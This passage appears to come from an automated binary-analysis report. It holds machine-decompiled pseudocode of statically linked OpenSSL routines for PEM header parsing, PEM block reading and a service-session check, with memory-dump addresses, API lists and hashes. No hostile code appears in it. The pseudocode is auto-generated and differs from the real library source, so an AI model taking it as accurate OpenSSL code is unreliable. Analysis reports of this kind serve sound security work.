                                                              							_t61 = _t60 + 0xa;
                                                              							_t62 = _t61 + E00C6DAD0(__ecx, _t61, " \t");
                                                              							_t77 = _t76 + 8;
                                                              							_t63 = _t62 + 1;
                                                              							__eflags =  *_t62 - 0x34;
                                                              							if( *_t62 != 0x34) {
                                                              								goto L5;
                                                              							} else {
                                                              								_t48 =  *_t63;
                                                              								_t64 = _t63 + 1;
                                                              								__eflags =  *_t63 - 0x2c;
                                                              								if( *_t63 != 0x2c) {
                                                              									goto L5;
                                                              								} else {
                                                              									_t65 = _t64 + E00C6DAD0(_t48, _t64, " \t");
                                                              									_t15 = E00C6B55B(_t48, _t65, "ENCRYPTED", 9);
                                                              									_t78 = _t77 + 0x14;
                                                              									__eflags = _t15;
                                                              									if(_t15 != 0) {
                                                              										L24:
                                                              										E00B98310(_t53, 9, 0x6b, 0x6a, "crypto\\pem\\pem_lib.c", 0x1ec);
                                                              										__eflags = 0;
                                                              										return 0;
                                                              									} else {
                                                              										_t66 = _t65 + 9;
                                                              										_t18 = E00C6DAD0(_t48, _t66, " \t\r\n");
                                                              										_t78 = _t78 + 8;
                                                              										__eflags = _t18;
                                                              										if(_t18 == 0) {
                                                              											goto L24;
                                                              										} else {
                                                              											_t19 = E00C6DAD0(_t48, _t66, " \t\r");
                                                              											_t68 = _t66 + _t19 + 1;
                                                              											__eflags =  *((intOrPtr*)(_t66 + _t19)) - 0xa;
                                                              											if( *((intOrPtr*)(_t66 + _t19)) == 0xa) {
                                                              												_t20 = E00C6B55B(_t48, _t68, "DEK-Info:", 9);
                                                              												__eflags = _t20;
                                                              												if(_t20 == 0) {
                                                              													_push(__edi);
                                                              													_t69 = _t68 + 9;
                                                              													_t70 = _t69 + E00C6DAD0(_t48, _t69, " \t");
                                                              													_t22 = E00C6DA80(_t48, _t70, " \t,");
                                                              													_t71 = _t70 + _t22;
                                                              													 *_t71 = 0;
                                                              													_t55 = E00BC0D50(_t70, _t70);
                                                              													 *_t73 = _t55;
                                                              													 *_t71 =  *((intOrPtr*)(_t70 + _t22));
                                                              													_t72 = _t71 + E00C6DAD0(_t48, _t71, " \t");
                                                              													_a4 = _t72;
                                                              													__eflags = _t55;
                                                              													if(_t55 != 0) {
                                                              														_t25 = E00B97400(_t55);
                                                              														__eflags = _t25;
                                                              														if(__eflags <= 0) {
                                                              															L20:
                                                              															if(__eflags != 0) {
                                                              																L23:
                                                              																_t26 = E00B97400(_t55);
                                                              																__eflags =  &_a4;
                                                              																_t27 = E00BAAC00(_t26,  &_a4,  &_a4);
                                                              																asm("sbb eax, eax");
                                                              																return  ~( ~_t27);
                                                              															} else {
                                                              																__eflags =  *_t72 - 0x2c;
                                                              																if( *_t72 != 0x2c) {
                                                              																	goto L23;
                                                              																} else {
                                                              																	E00B98310(_t55, 9, 0x6b, 0x82, "crypto\\pem\\pem_lib.c", 0x216);
                                                              																	__eflags = 0;
                                                              																	return 0;
                                                              																}
                                                              															}
                                                              														} else {
                                                              															_t50 =  *_t72;
                                                              															_t72 = _t72 + 1;
                                                              															_a4 = _t72;
                                                              															__eflags = _t50 - 0x2c;
                                                              															if(_t50 == 0x2c) {
                                                              																__eflags = _t25;
                                                              																goto L20;
                                                              															} else {
                                                              																E00B98310(_t55, 9, 0x6b, 0x81, "crypto\\pem\\pem_lib.c", 0x213);
                                                              																__eflags = 0;
                                                              																return 0;
                                                              															}
                                                              														}
                                                              													} else {
                                                              														E00B98310(_t55, 9, 0x6b, 0x72, "crypto\\pem\\pem_lib.c", 0x20e);
                                                              														__eflags = 0;
                                                              														return 0;
                                                              													}
                                                              												} else {
                                                              													E00B98310(__edi, 9, 0x6b, 0x69, "crypto\\pem\\pem_lib.c", 0x1fb);
                                                              													__eflags = 0;
                                                              													return 0;
                                                              												}
                                                              											} else {
                                                              												E00B98310(__edi, 9, 0x6b, 0x70, "crypto\\pem\\pem_lib.c", 0x1f2);
                                                              												__eflags = 0;
                                                              												return 0;
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						} else {
                                                              							E00B98310(__edi, 9, 0x6b, 0x6b, "crypto\\pem\\pem_lib.c", 0x1df);
                                                              							L5:
                                                              							return 0;
                                                              						}
                                                              					}
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _strspn$_strncmp
                                                              • String ID: $ $ ,$DEK-Info:$ENCRYPTED$Proc-Type:$crypto\pem\pem_lib.c
                                                              • API String ID: 2057175535-2412464277
                                                              • Opcode ID: fd59317f99ba71549130dbaab8ad80bddcbfc58bbbc39cc09c4011ae8a5d7947
                                                              • Instruction ID: da69d834d033c2972b1a2004810cd9db15081fe3d5c230a95a65c2d7e0d2bd04
                                                              • Opcode Fuzzy Hash: fd59317f99ba71549130dbaab8ad80bddcbfc58bbbc39cc09c4011ae8a5d7947
                                                              • Instruction Fuzzy Hash: EE51A8B6BCC71435F63135A86C43FAB66C88B52F18F0948B5FE4DE52C3F782495242A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 62%
                                                              			E00BAAF10(void* __edi, void* __esi, void* __ebp, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, char _a24, intOrPtr* _a28, intOrPtr* _a32, intOrPtr* _a36, intOrPtr* _a40, char _a44, char _a48, char _a57, char _a59, char _a302, signed int _a304, intOrPtr _a312, intOrPtr* _a316, intOrPtr* _a320, intOrPtr* _a324, intOrPtr* _a328) {
                                                              				char _v0;
                                                              				void* __ebx;
                                                              				signed int _t137;
                                                              				intOrPtr _t141;
                                                              				intOrPtr* _t144;
                                                              				intOrPtr _t150;
                                                              				void* _t152;
                                                              				void* _t154;
                                                              				void* _t155;
                                                              				intOrPtr* _t156;
                                                              				void* _t159;
                                                              				void* _t160;
                                                              				void* _t164;
                                                              				void* _t166;
                                                              				intOrPtr _t168;
                                                              				intOrPtr* _t169;
                                                              				void* _t171;
                                                              				void* _t173;
                                                              				void* _t174;
                                                              				intOrPtr _t176;
                                                              				void* _t177;
                                                              				void* _t179;
                                                              				intOrPtr _t181;
                                                              				void* _t188;
                                                              				char _t189;
                                                              				void* _t190;
                                                              				void* _t194;
                                                              				void* _t195;
                                                              				void* _t199;
                                                              				void* _t200;
                                                              				intOrPtr _t215;
                                                              				intOrPtr _t218;
                                                              				void* _t237;
                                                              				void* _t241;
                                                              				char _t256;
                                                              				void* _t257;
                                                              				intOrPtr* _t261;
                                                              				void* _t262;
                                                              				void* _t263;
                                                              				intOrPtr _t264;
                                                              				void* _t265;
                                                              				intOrPtr _t266;
                                                              				void* _t267;
                                                              				intOrPtr _t268;
                                                              				void* _t271;
                                                              				void* _t272;
                                                              				void* _t273;
                                                              				void* _t274;
                                                              				void* _t275;
                                                              				intOrPtr _t277;
                                                              				signed int _t278;
                                                              				signed int _t279;
                                                              				void* _t281;
                                                              				void* _t282;
                                                              				void* _t283;
                                                              				void* _t284;
                                                              
                                                              				E00C6BB10(0x134);
                                                              				_t137 =  *0xcc5970; // 0x851ab4dd
                                                              				_a304 = _t137 ^ _t278;
                                                              				_t234 = _a324;
                                                              				_a36 = _a316;
                                                              				_t277 = _a312;
                                                              				_a28 = _a320;
                                                              				_a32 = _a324;
                                                              				_a40 = _a328;
                                                              				_t141 = E00BC03F0();
                                                              				_t208 = 0;
                                                              				_a16 = _t141;
                                                              				_a20 = 0;
                                                              				_v0 = 0;
                                                              				_a24 = 0;
                                                              				if(_t141 != 0) {
                                                              					_push(__esi);
                                                              					_push(__edi);
                                                              					_t256 = E00BA97E0(0, __edi);
                                                              					_a12 = _t256;
                                                              					_t261 = E00BA97E0(0, _t256);
                                                              					_a8 = _t261;
                                                              					_t144 = E00BA97E0(0, _t256);
                                                              					_a4 = _t144;
                                                              					if(_t256 == 0 || _t261 == 0 || _t144 == 0) {
                                                              						L63:
                                                              						E00BA9810(_t208, _t256, _t277, _a12);
                                                              						_t235 = _a8;
                                                              						E00BA9810(_t208, _t256, _t277, _a8);
                                                              						E00BA9810(_t208, _t256, _t277, _a4);
                                                              						E00BC0410(_a16);
                                                              						_t279 = _t278 + 0x10;
                                                              						_t150 = 0;
                                                              					} else {
                                                              						_t214 =  &_a48;
                                                              						_a302 = 0;
                                                              						_t152 = E00B95290(0, _t256, _t277, _t277,  &_a48, 0xfe);
                                                              						_t281 = _t278 + 0xc;
                                                              						if(_t152 <= 0) {
                                                              							L13:
                                                              							_push(0x2b3);
                                                              							_push("crypto\\pem\\pem_lib.c");
                                                              							_push(0x6c);
                                                              							goto L62;
                                                              						} else {
                                                              							do {
                                                              								while( *((char*)(_t281 + _t152 + 0x40)) <= 0x20) {
                                                              									_t152 = _t152 - 1;
                                                              									if(_t152 >= 0) {
                                                              										continue;
                                                              									}
                                                              									break;
                                                              								}
                                                              								_t154 = _t152 + 1;
                                                              								 *((char*)(_t281 + _t154 + 0x48)) = 0xa;
                                                              								 *((char*)(_t281 + _t154 + 0x4d)) = _t208;
                                                              								_t155 = E00C6B55B(_t214,  &_a48, "-----BEGIN ", 0xb);
                                                              								_t282 = _t281 + 0xc;
                                                              								if(_t155 != 0) {
                                                              									goto L12;
                                                              								} else {
                                                              									_t156 =  &_a59;
                                                              									_t237 = _t156 + 1;
                                                              									do {
                                                              										_t215 =  *_t156;
                                                              										_t156 = _t156 + 1;
                                                              									} while (_t215 != _t208);
                                                              									_t263 = _t156 - _t237;
                                                              									_t159 = E00C6B55B(_t215, _t282 + _t263 + 0x49, "-----\n", 6);
                                                              									_t282 = _t282 + 0xc;
                                                              									if(_t159 == 0) {
                                                              										_t160 = E00BA98C0(_t277, _t256, _t263 + 9);
                                                              										_t281 = _t282 + 8;
                                                              										if(_t160 != 0) {
                                                              											E00C6B7A0(_t208, _t256, _t263,  *((intOrPtr*)(_t256 + 4)),  &_a59, _t263 - 6);
                                                              											 *((char*)( *((intOrPtr*)(_t256 + 4)) + _t263 - 6)) = _t208;
                                                              											_t264 = _a8;
                                                              											_t256 = 0;
                                                              											_t164 = E00BA98C0(_t277, _t264, 0x100);
                                                              											_t281 = _t281 + 0x14;
                                                              											if(_t164 != 0) {
                                                              												 *((char*)( *((intOrPtr*)(_t264 + 4)))) = _t208;
                                                              												_t265 = E00B95290(_t208, 0, _t277, _t277,  &_a48, 0xfe);
                                                              												_t283 = _t281 + 0xc;
                                                              												if(_t265 <= _t208) {
                                                              													L28:
                                                              													_t266 = _a4;
                                                              													_v0 = _t208;
                                                              													_t166 = E00BA98C0(_t277, _t266, 0x400);
                                                              													_t281 = _t283 + 8;
                                                              													if(_t166 != 0) {
                                                              														 *((char*)( *((intOrPtr*)(_t266 + 4)))) = _t208;
                                                              														if(_a24 != _t208) {
                                                              															_t168 = _a8;
                                                              															_v0 = _t256;
                                                              															_a8 = _t266;
                                                              															_a4 = _t168;
                                                              															_t256 = _t168;
                                                              														} else {
                                                              															_t224 =  &_a48;
                                                              															_t271 = E00B95290(_t208, _t256, _t277, _t277,  &_a48, 0xfe);
                                                              															_t281 = _t281 + 0xc;
                                                              															if(_t271 <= _t208) {
                                                              																L49:
                                                              																_t256 = _a4;
                                                              															} else {
                                                              																do {
                                                              																	while( *((char*)(_t281 + _t271 + 0x40)) <= 0x20) {
                                                              																		_t271 = _t271 - 1;
                                                              																		if(_t271 >= 0) {
                                                              																			continue;
                                                              																		}
                                                              																		break;
                                                              																	}
                                                              																	_t272 = _t271 + 1;
                                                              																	 *((char*)(_t281 + _t272 + 0x40)) = 0xa;
                                                              																	_t273 = _t272 + 1;
                                                              																	 *((char*)(_t281 + _t273 + 0x40)) = _t208;
                                                              																	if(_t273 != 0x41) {
                                                              																		_a20 = 1;
                                                              																	}
                                                              																	_t188 = E00C6B55B(_t224,  &_a48, "-----END ", 9);
                                                              																	_t281 = _t281 + 0xc;
                                                              																	if(_t188 == 0 || _t273 > 0x41) {
                                                              																		goto L49;
                                                              																	} else {
                                                              																		_t189 = _v0;
                                                              																		_t256 = _a4;
                                                              																		_t78 = _t189 + 9; // 0xb
                                                              																		_t190 = E00BA99A0(_t277, _t256, _t273 + _t78);
                                                              																		_t281 = _t281 + 8;
                                                              																		if(_t190 == 0) {
                                                              																			_push(0x301);
                                                              																			_push("crypto\\pem\\pem_lib.c");
                                                              																			_push(0x41);
                                                              																			goto L62;
                                                              																		} else {
                                                              																			E00C6B7A0(_t208, _t256, _t273,  *((intOrPtr*)(_t256 + 4)) + _v0,  &_a48, _t273);
                                                              																			_t224 =  *((intOrPtr*)(_t256 + 4)) + _t273;
                                                              																			_t284 = _t281 + 0xc;
                                                              																			 *((char*)( *((intOrPtr*)(_t256 + 4)) + _t273 + _v0)) = _t208;
                                                              																			_v0 = _v0 + _t273;
                                                              																			_push(0xfe);
                                                              																			if(_a20 != _t208) {
                                                              																				_push( &_a48);
                                                              																				_push(_t277);
                                                              																				_a48 = _t208;
                                                              																				_t194 = E00B95290(_t208, _t256, _t277);
                                                              																				_t281 = _t284 + 0xc;
                                                              																				if(_t194 > _t208) {
                                                              																					while( *((char*)(_t281 + _t194 + 0x40)) <= 0x20) {
                                                              																						_t194 = _t194 - 1;
                                                              																						if(_t194 >= 0) {
                                                              																							continue;
                                                              																						}
                                                              																						break;
                                                              																					}
                                                              																					_t195 = _t194 + 1;
                                                              																					 *((char*)(_t281 + _t195 + 0x40)) = 0xa;
                                                              																					 *((char*)(_t281 + _t195 + 0x41)) = _t208;
                                                              																				}
                                                              																				L50:
                                                              																				_t277 = _a12;
                                                              																				_t169 = _a4;
                                                              																				_t241 = _t169 + 1;
                                                              																				do {
                                                              																					_t218 =  *_t169;
                                                              																					_t169 = _t169 + 1;
                                                              																				} while (_t218 != _t208);
                                                              																				_t267 = _t169 - _t241;
                                                              																				_t171 = E00C6B55B(_t218,  &_a48, "-----END ", 9);
                                                              																				_t281 = _t281 + 0xc;
                                                              																				if(_t171 != 0) {
                                                              																					L61:
                                                              																					_push(0x31f);
                                                              																					_push("crypto\\pem\\pem_lib.c");
                                                              																					_push(0x66);
                                                              																					goto L62;
                                                              																				} else {
                                                              																					_t219 = _a4;
                                                              																					_t173 = E00C6B55B(_a4, _a4,  &_a57, _t267);
                                                              																					_t281 = _t281 + 0xc;
                                                              																					if(_t173 != 0) {
                                                              																						goto L61;
                                                              																					} else {
                                                              																						_t174 = E00C6B55B(_t219, _t281 + _t267 + 0x4d, "-----\n", 6);
                                                              																						_t281 = _t281 + 0xc;
                                                              																						if(_t174 != 0) {
                                                              																							goto L61;
                                                              																						} else {
                                                              																							_t268 = _a16;
                                                              																							E00BC0540(_t268);
                                                              																							_t176 =  *((intOrPtr*)(_t256 + 4));
                                                              																							_push(_v0);
                                                              																							_push(_t176);
                                                              																							_push( &_v0);
                                                              																							_push(_t176);
                                                              																							_push(_t268);
                                                              																							_t177 = E00BC0890();
                                                              																							_t281 = _t281 + 0x18;
                                                              																							if(_t177 >= 0) {
                                                              																								_t179 = E00BC06B0(_t268,  *((intOrPtr*)(_t256 + 4)) + _v0,  &_a44);
                                                              																								_t278 = _t281 + 0xc;
                                                              																								if(_t179 >= 0) {
                                                              																									_t181 = _v0 + _a44;
                                                              																									_v0 = _t181;
                                                              																									if(_t181 == 0) {
                                                              																										goto L63;
                                                              																									} else {
                                                              																										_t208 = _a32;
                                                              																										 *_a36 =  *((intOrPtr*)(_t277 + 4));
                                                              																										 *_a28 =  *((intOrPtr*)(_a8 + 4));
                                                              																										_push(0x338);
                                                              																										 *_a32 =  *((intOrPtr*)(_a4 + 4));
                                                              																										_t235 = _a40;
                                                              																										_push("crypto\\pem\\pem_lib.c");
                                                              																										 *_a40 = _t181;
                                                              																										E00BA3490(_t277);
                                                              																										_push(0x339);
                                                              																										_push("crypto\\pem\\pem_lib.c");
                                                              																										E00BA3490(_a8);
                                                              																										_push(0x33a);
                                                              																										_push("crypto\\pem\\pem_lib.c");
                                                              																										E00BA3490(_a4);
                                                              																										E00BC0410(_a16);
                                                              																										_t279 = _t278 + 0x28;
                                                              																										_t150 = 1;
                                                              																									}
                                                              																								} else {
                                                              																									_push(0x32d);
                                                              																									_push("crypto\\pem\\pem_lib.c");
                                                              																									_push(0x64);
                                                              																									goto L62;
                                                              																								}
                                                              																							} else {
                                                              																								_push(0x328);
                                                              																								_push("crypto\\pem\\pem_lib.c");
                                                              																								_push(0x64);
                                                              																								goto L62;
                                                              																							}
                                                              																						}
                                                              																					}
                                                              																				}
                                                              																			} else {
                                                              																				goto L40;
                                                              																			}
                                                              																		}
                                                              																	}
                                                              																	goto L64;
                                                              																	L40:
                                                              																	_push( &_a48);
                                                              																	_push(_t277);
                                                              																	_t271 = E00B95290(_t208, _t256, _t277);
                                                              																	_t281 = _t284 + 0xc;
                                                              																} while (_t271 > _t208);
                                                              															}
                                                              														}
                                                              														goto L50;
                                                              													} else {
                                                              														_push(0x2eb);
                                                              														_push("crypto\\pem\\pem_lib.c");
                                                              														_push(0x41);
                                                              														goto L62;
                                                              													}
                                                              												} else {
                                                              													do {
                                                              														while( *((char*)(_t283 + _t265 + 0x40)) <= 0x20) {
                                                              															_t265 = _t265 - 1;
                                                              															if(_t265 >= 0) {
                                                              																continue;
                                                              															}
                                                              															break;
                                                              														}
                                                              														_t274 = _t265 + 1;
                                                              														 *((char*)(_t283 + _t274 + 0x40)) = 0xa;
                                                              														_t275 = _t274 + 1;
                                                              														 *((char*)(_t283 + _t275 + 0x40)) = _t208;
                                                              														if(_a48 == 0xa) {
                                                              															goto L28;
                                                              														} else {
                                                              															_t228 = _a8;
                                                              															_t52 = _t256 + 9; // 0xa
                                                              															_t199 = E00BA98C0(_t277, _a8, _t275 + _t52);
                                                              															_t281 = _t283 + 8;
                                                              															if(_t199 == 0) {
                                                              																_push(0x2dd);
                                                              																_push("crypto\\pem\\pem_lib.c");
                                                              																_push(0x41);
                                                              																goto L62;
                                                              															} else {
                                                              																_t200 = E00C6B55B(_t228,  &_a48, "-----END ", 9);
                                                              																_t283 = _t281 + 0xc;
                                                              																if(_t200 == 0) {
                                                              																	_a24 = 1;
                                                              																	goto L28;
                                                              																} else {
                                                              																	goto L24;
                                                              																}
                                                              															}
                                                              														}
                                                              														goto L64;
                                                              														L24:
                                                              														E00C6B7A0(_t208, _t256, _t275,  *((intOrPtr*)(_a8 + 4)) + _t256,  &_a48, _t275);
                                                              														 *((char*)( *((intOrPtr*)(_a8 + 4)) + _t275 + _t256)) = _t208;
                                                              														_t256 = _t256 + _t275;
                                                              														_t265 = E00B95290(_t208, _t256, _t277, _t277,  &_a48, 0xfe);
                                                              														_t283 = _t283 + 0x18;
                                                              													} while (_t265 > _t208);
                                                              													goto L28;
                                                              												}
                                                              											} else {
                                                              												_push(0x2cc);
                                                              												_push("crypto\\pem\\pem_lib.c");
                                                              												_push(0x41);
                                                              												goto L62;
                                                              											}
                                                              										} else {
                                                              											_push(0x2c2);
                                                              											_push("crypto\\pem\\pem_lib.c");
                                                              											_push(0x41);
                                                              											L62:
                                                              											_push(0x6d);
                                                              											_push(9);
                                                              											E00B98310(_t256);
                                                              											_t278 = _t281 + 0x14;
                                                              											goto L63;
                                                              										}
                                                              									} else {
                                                              										goto L12;
                                                              									}
                                                              								}
                                                              								goto L64;
                                                              								L12:
                                                              								_t214 =  &_a48;
                                                              								_t152 = E00B95290(_t208, _t256, _t277, _t277,  &_a48, 0xfe);
                                                              								_t281 = _t282 + 0xc;
                                                              							} while (_t152 > _t208);
                                                              							goto L13;
                                                              						}
                                                              					}
                                                              					L64:
                                                              					_pop(_t257);
                                                              					_pop(_t262);
                                                              					return E00C69C26(_t150, _t208, _a304 ^ _t279, _t235, _t257, _t262);
                                                              				} else {
                                                              					E00B98310(__edi, 9, 0x6d, 0x41, "crypto\\pem\\pem_lib.c", 0x2a3);
                                                              					return E00C69C26(0, 0, _a304 ^ _t278 + 0x00000014, _t234, __edi, __esi);
                                                              				}
                                                              			}
                                                              0x00bab37d
                                                              0x00bab382
                                                              0x00bab38b
                                                              0x00bab38e
                                                              0x00bab38f
                                                              0x00bab394
                                                              0x00bab395
                                                              0x00bab396
                                                              0x00bab397
                                                              0x00bab39c
                                                              0x00bab3a1
                                                              0x00bab3c2
                                                              0x00bab3c7
                                                              0x00bab3cc
                                                              0x00bab3e3
                                                              0x00bab3e7
                                                              0x00bab3eb
                                                              0x00000000
                                                              0x00bab3f1
                                                              0x00bab3f9
                                                              0x00bab402
                                                              0x00bab40b
                                                              0x00bab414
                                                              0x00bab419
                                                              0x00bab41b
                                                              0x00bab41f
                                                              0x00bab425
                                                              0x00bab427
                                                              0x00bab42c
                                                              0x00bab431
                                                              0x00bab437
                                                              0x00bab43c
                                                              0x00bab441
                                                              0x00bab447
                                                              0x00bab451
                                                              0x00bab456
                                                              0x00bab459
                                                              0x00bab459
                                                              0x00bab3ce
                                                              0x00bab3ce
                                                              0x00bab3d3
                                                              0x00bab3d8
                                                              0x00000000
                                                              0x00bab3d8
                                                              0x00bab3a3
                                                              0x00bab3a3
                                                              0x00bab3a8
                                                              0x00bab3ad
                                                              0x00000000
                                                              0x00bab3ad
                                                              0x00bab3a1
                                                              0x00bab377
                                                              0x00bab35b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab29a
                                                              0x00bab269
                                                              0x00000000
                                                              0x00bab29c
                                                              0x00bab2a0
                                                              0x00bab2a1
                                                              0x00bab2a7
                                                              0x00bab2a9
                                                              0x00bab2ac
                                                              0x00bab2b4
                                                              0x00bab202
                                                              0x00000000
                                                              0x00bab1cb
                                                              0x00bab1cb
                                                              0x00bab1d0
                                                              0x00bab1d5
                                                              0x00000000
                                                              0x00bab1d5
                                                              0x00bab106
                                                              0x00bab106
                                                              0x00bab106
                                                              0x00bab10d
                                                              0x00bab110
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab110
                                                              0x00bab112
                                                              0x00bab113
                                                              0x00bab118
                                                              0x00bab119
                                                              0x00bab122
                                                              0x00000000
                                                              0x00bab128
                                                              0x00bab128
                                                              0x00bab12c
                                                              0x00bab132
                                                              0x00bab137
                                                              0x00bab13c
                                                              0x00bab198
                                                              0x00bab19d
                                                              0x00bab1a2
                                                              0x00000000
                                                              0x00bab13e
                                                              0x00bab14a
                                                              0x00bab14f
                                                              0x00bab154
                                                              0x00bab1a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab154
                                                              0x00bab13c
                                                              0x00000000
                                                              0x00bab156
                                                              0x00bab166
                                                              0x00bab17e
                                                              0x00bab182
                                                              0x00bab189
                                                              0x00bab18b
                                                              0x00bab18e
                                                              0x00000000
                                                              0x00bab196
                                                              0x00bab0d3
                                                              0x00bab0d3
                                                              0x00bab0d8
                                                              0x00bab0dd
                                                              0x00000000
                                                              0x00bab0dd
                                                              0x00bab091
                                                              0x00bab091
                                                              0x00bab096
                                                              0x00bab09b
                                                              0x00bab46c
                                                              0x00bab46c
                                                              0x00bab46e
                                                              0x00bab470
                                                              0x00bab475
                                                              0x00000000
                                                              0x00bab475
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab056
                                                              0x00000000
                                                              0x00bab058
                                                              0x00bab05d
                                                              0x00bab063
                                                              0x00bab068
                                                              0x00bab06b
                                                              0x00000000
                                                              0x00bab000
                                                              0x00baaffe
                                                              0x00bab4a5
                                                              0x00bab4ac
                                                              0x00bab4ad
                                                              0x00bab4bd
                                                              0x00baaf78
                                                              0x00baaf88
                                                              0x00baafa8
                                                              0x00baafa8

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _strncmp
                                                              • String ID: $-----$-----BEGIN $-----END $crypto\pem\pem_lib.c
                                                              • API String ID: 909875538-1286483939
                                                              • Opcode ID: 94e1242b56e7db3af4e59b0959708b9741351bf9d944fd728c51cd01931d1d2a
                                                              • Instruction ID: 7d11f166821932857e742b0d8c3b56da6b0c43812ed9a19a1089680ba8abefef
                                                              • Opcode Fuzzy Hash: 94e1242b56e7db3af4e59b0959708b9741351bf9d944fd728c51cd01931d1d2a
                                                              • Instruction Fuzzy Hash: 7BF1F67164C301ABD720EF24C882F6FB7E8AB86704F0449ADFA9597243E775E905C792
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 74%
                                                              			E00BA78F0() {
                                                              				signed int _v8;
                                                              				long _v12;
                                                              				void* _v24;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t20;
                                                              				WCHAR* _t22;
                                                              				unsigned int _t31;
                                                              				signed int _t33;
                                                              				struct HINSTANCE__* _t39;
                                                              				void* _t40;
                                                              				void* _t41;
                                                              				void* _t49;
                                                              				void* _t51;
                                                              				long _t52;
                                                              				signed int _t54;
                                                              				void* _t55;
                                                              
                                                              				E00C6BB10(8);
                                                              				_t20 =  *0xcc5970; // 0x851ab4dd
                                                              				_v8 = _t20 ^ _t54;
                                                              				_t22 =  *0xcc8bcc;
                                                              				if(_t22 != 0) {
                                                              					L12:
                                                              					if(_t22 == 0xffffffff) {
                                                              						goto L6;
                                                              					} else {
                                                              						return E00C69C26( *_t22(), _t40, _v8 ^ _t54, _t49, _t51, _t52);
                                                              					}
                                                              				} else {
                                                              					_t39 = GetModuleHandleW(_t22);
                                                              					if(_t39 == 0) {
                                                              						_t22 =  *0xcc8bcc;
                                                              					} else {
                                                              						_t22 = GetProcAddress(_t39, "_OPENSSL_isservice");
                                                              						 *0xcc8bcc = _t22;
                                                              					}
                                                              					if(_t22 != 0) {
                                                              						goto L12;
                                                              					} else {
                                                              						 *0xcc8bcc = 0xffffffff;
                                                              						L6:
                                                              						_t41 = GetProcessWindowStation();
                                                              						if(_t41 == 0 || GetUserObjectInformationW(_t41, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
                                                              							L14:
                                                              							return E00C69C26(_t23 | 0xffffffff, _t41, _v8 ^ _t54, _t49, _t51, _t52);
                                                              						} else {
                                                              							_t23 = _v12;
                                                              							if(_t23 > 0x200) {
                                                              								goto L14;
                                                              							} else {
                                                              								_t52 = _t23 + 0x00000001 & 0xfffffffe;
                                                              								_v12 = _t52;
                                                              								E00C6C610(_t52 + 2);
                                                              								_t51 = _t55;
                                                              								if(GetUserObjectInformationW(_t41, 2, _t51, _t52,  &_v12) == 0) {
                                                              									goto L14;
                                                              								} else {
                                                              									_t31 = _v12 + 0x00000001 & 0xfffffffe;
                                                              									_v12 = _t31;
                                                              									 *((short*)(_t51 + (_t31 >> 1) * 2)) = 0;
                                                              									_t33 = E00C6C5AB(_t51, L"Service-0x");
                                                              									asm("sbb eax, eax");
                                                              									return E00C69C26( ~( ~_t33), _t41, _v8 ^ _t54, 0, _t51, _t52);
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              			}


                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,00BA7B90,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7918
                                                              • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BA7928
                                                              • GetProcessWindowStation.USER32(?,?,?,?,00BA7B90,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA794C
                                                              • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,?,?,00BA7B90,?,?,?,?), ref: 00BA7967
                                                              • GetLastError.KERNEL32(?,?,?,00BA7B90,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7975
                                                              • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,?,?,00BA7B90,?,?,?,?), ref: 00BA79AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                              • String ID: Service-0x$_OPENSSL_isservice
                                                              • API String ID: 1944374717-1672312481
                                                              • Opcode ID: 9c1ecb4a6644533da1edff8de915cb5edca2addde86ab6ff39c43e2f68b15dca
                                                              • Instruction ID: 19eeae08ec216ad1b2fdbd40d72b1454e79135d07975dd2db2e1195fb4185152
                                                              • Opcode Fuzzy Hash: 9c1ecb4a6644533da1edff8de915cb5edca2addde86ab6ff39c43e2f68b15dca
                                                              • Instruction Fuzzy Hash: E731A771648209BBDB10DFB9EC85BAEB7A8EF45320F600665E915D31D0EF3099058790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
